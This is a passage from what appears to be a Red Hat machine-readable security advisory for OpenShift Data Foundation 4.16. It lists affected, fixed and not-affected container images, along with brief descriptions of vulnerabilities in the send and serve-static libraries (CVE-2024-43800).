"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
